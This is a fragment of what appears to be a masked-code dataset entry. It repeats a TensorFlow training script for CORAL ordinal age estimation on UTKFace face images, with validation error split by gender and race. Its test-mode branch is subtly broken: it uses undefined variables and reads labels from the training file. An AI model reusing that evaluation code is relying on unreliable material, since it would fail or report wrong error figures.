FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name 
= np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator 
= data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n y = np.unique(label)\n m = np.zeros(label.shape)\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, num_examples - label[label > t\n ].size])\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n return imp\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n 
ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 
1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\n<mask token>\n",
"step-3": "<mask token>\nflags.DEFINE_string('img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')\nflags.DEFINE_string('txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt'\n , 'Text (with label information) directory')\nflags.DEFINE_string('val_img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/',\n 'Validate image path')\nflags.DEFINE_string('val_txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt'\n , 'Validate text path')\nflags.DEFINE_string('val_txt_path_2',\n 'D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt'\n , 'Validataion text path')\nflags.DEFINE_integer('img_size', 128, 'Image size')\nflags.DEFINE_integer('ch', 3, 'Image channels')\nflags.DEFINE_integer('batch_size', 256, 'Train Batch size')\nflags.DEFINE_integer('val_batch_size', 128, 'Validation Batch size')\nflags.DEFINE_integer('val_batch_size_2', 128, 'Validation2 batch size')\nflags.DEFINE_integer('num_classes', 48, 'Number of classes')\nflags.DEFINE_integer('epochs', 5000, 'Total epochs of training')\nflags.DEFINE_float('lr', 5e-05, 'Learning rate')\nflags.DEFINE_string('weights',\n '/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5'\n , '')\nflags.DEFINE_bool('train', True, 'True or False')\nflags.DEFINE_bool('pre_checkpoint', False, 'True or False')\nflags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')\nflags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')\nflags.DEFINE_string('graphs', '', '')\nflags.DEFINE_integer('n_test', 10000, 'Number of test images')\nflags.DEFINE_string('test_txt', '', 'Test text(label) path')\nflags.DEFINE_string('test_img', '', 'Test images path')\nflags.DEFINE_string('output_loss_txt',\n '/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt', ''\n )\n<mask token>\nFLAGS(sys.argv)\n<mask token>\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n y = np.unique(label)\n m = np.zeros(label.shape)\n 
for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, num_examples - label[label > t\n ].size])\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n return imp\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), 
np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\nif __name__ == '__main__':\n app.run(main)\n",
"step-4": "<mask token>\nflags.DEFINE_string('img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')\nflags.DEFINE_string('txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt'\n , 'Text (with label information) directory')\nflags.DEFINE_string('val_img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/',\n 'Validate image path')\nflags.DEFINE_string('val_txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt'\n , 'Validate text path')\nflags.DEFINE_string('val_txt_path_2',\n 'D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt'\n , 'Validataion text path')\nflags.DEFINE_integer('img_size', 128, 'Image size')\nflags.DEFINE_integer('ch', 3, 'Image channels')\nflags.DEFINE_integer('batch_size', 256, 'Train Batch size')\nflags.DEFINE_integer('val_batch_size', 128, 'Validation Batch size')\nflags.DEFINE_integer('val_batch_size_2', 128, 'Validation2 batch size')\nflags.DEFINE_integer('num_classes', 48, 'Number of classes')\nflags.DEFINE_integer('epochs', 5000, 'Total epochs of training')\nflags.DEFINE_float('lr', 5e-05, 'Learning rate')\nflags.DEFINE_string('weights',\n '/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5'\n , '')\nflags.DEFINE_bool('train', True, 'True or False')\nflags.DEFINE_bool('pre_checkpoint', False, 'True or False')\nflags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')\nflags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')\nflags.DEFINE_string('graphs', '', '')\nflags.DEFINE_integer('n_test', 10000, 'Number of test images')\nflags.DEFINE_string('test_txt', '', 'Test text(label) path')\nflags.DEFINE_string('test_img', '', 'Test images path')\nflags.DEFINE_string('output_loss_txt',\n '/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt', ''\n )\nFLAGS = flags.FLAGS\nFLAGS(sys.argv)\noptimizer = tf.keras.optimizers.Adam(FLAGS.lr, beta_1=0.9, beta_2=0.99)\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = 
label.size\n y = np.unique(label)\n m = np.zeros(label.shape)\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, num_examples - label[label > t\n ].size])\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n return imp\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = 